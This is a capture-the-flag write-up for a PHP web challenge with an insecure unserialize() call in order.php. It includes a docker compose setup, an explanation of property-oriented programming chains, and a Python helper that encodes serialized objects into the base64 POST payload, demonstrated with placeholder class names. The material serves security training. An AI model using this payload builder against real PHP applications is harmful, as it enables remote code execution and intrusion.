# POP Restaurant - web - easy

## Description

Spent a week to create this food ordering system. Hope that it will not have any critical vulnerability in my application.

----

## General

- Flag is in `/` under a randomized file name, e.g. `/sXrq5wWZZYpMh_flag.txt`
- Therefore the name is not guessable; reading it probably needs RCE (or at least a directory listing of `/`)
- Attack vector: PHP object injection through `unserialize()`, explained at https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection

## Compose

Place this compose file one directory level above the provided challenge folder, so that `./challenge` is the directory containing the `Dockerfile`.

Launch with `docker compose up --watch`; the `develop.watch` entries sync the web root and the flag file into the container on change, so edits to the challenge sources are visible without a rebuild.

```yaml
services:
  web-pop_restaurant:
    build:
      context: ./challenge # if one level above provided challenge files.
      dockerfile: Dockerfile
    container_name: web-pop_restaurant
    ports:
      - "1337:80"
    stdin_open: true
    tty: true
    develop:
      watch:
        - action: sync
          path: ./challenge/challenge
          target: /var/www/html
          ignore:
            - .git/
        - action: sync
          path: ./challenge/flag.txt
          target: /flag.txt
```

## `order.php`

```php=16
$order = unserialize(base64_decode($_POST['data']));
```

User-controlled input, unsanitized, goes straight into `unserialize()`. The base64 wrapper is not a protection: the attacker simply base64-encodes a serialized string of their own. Any class the application has loaded can be instantiated with attacker-chosen property values, and its magic methods (`__wakeup`, `__destruct`, `__toString`, ...) run on the server; chaining such objects through their properties is the POP (property-oriented programming) chain the challenge name hints at.

That's bad :(
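As an added worked example (not part of the original notes and not taken from the challenge's source), here is a small Python encoder for PHP's `serialize()` format, used to build the base64 `data` field that `order.php` unserializes. The class and property names in the demo (`OuterGadget`, `InnerGadget`, `next`, `target`) are placeholders; the real gadget classes and the properties a POP chain needs come from the challenge's PHP source, which is not reproduced on this page.

```python
import base64
from dataclasses import dataclass, field
from typing import Any
from urllib.parse import quote


@dataclass
class PHPObject:
    """A PHP object to serialize: class name plus its properties.

    PHP mangles non-public property names inside serialize() output:
      public    -> "name"
      protected -> "\\0*\\0name"
      private   -> "\\0ClassName\\0name"
    Use protected_prop()/private_prop() to build the mangled keys, otherwise
    unserialize() creates a fresh public property that the gadget never reads.
    """
    cls: str
    props: dict = field(default_factory=dict)


def protected_prop(name: str) -> str:
    return f"\x00*\x00{name}"


def private_prop(cls: str, name: str) -> str:
    return f"\x00{cls}\x00{name}"


def php_serialize(value: Any) -> str:
    """Encode a Python value the way PHP's serialize() would."""
    if value is None:
        return "N;"
    if isinstance(value, bool):          # must precede int: bool is an int subclass
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, float):
        return f"d:{value!r};"
    if isinstance(value, str):
        # PHP counts bytes, not characters: measure the UTF-8 encoding and keep
        # the bytes 1:1 as latin-1 code points so build_payload can recover them.
        raw = value.encode("utf-8")
        return f's:{len(raw)}:"{raw.decode("latin-1")}";'
    if isinstance(value, PHPObject):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return f'O:{len(value.cls)}:"{value.cls}":{len(value.props)}:{{{body}}}'
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, (list, tuple)):
        return php_serialize(dict(enumerate(value)))
    raise TypeError(f"cannot serialize {type(value).__name__}")


def build_payload(obj: PHPObject) -> str:
    """Return the base64 value order.php expects in the `data` POST field."""
    return base64.b64encode(php_serialize(obj).encode("latin-1")).decode("ascii")


def decode_payload(b64: str) -> str:
    """Reverse build_payload: what the server sees after base64_decode()."""
    return base64.b64decode(b64).decode("latin-1")


def form_body(obj: PHPObject) -> str:
    """URL-encoded POST body; base64's '+', '/' and '=' must be percent-encoded."""
    return "data=" + quote(build_payload(obj), safe="")


if __name__ == "__main__":
    # Placeholder gadget chain (hypothetical names): an outer object whose
    # property holds an inner object with a protected property.
    chain = PHPObject("OuterGadget", {
        "next": PHPObject("InnerGadget", {protected_prop("target"): "value"}),
    })
    print(php_serialize(chain))
    print(form_body(chain))
```

Run it and send the printed `data=...` body in a POST to `order.php`. If the named class is not loaded by the application at `unserialize()` time, PHP builds a `__PHP_Incomplete_Class` instead, so only classes the app autoloads (or has already included) are usable in a chain.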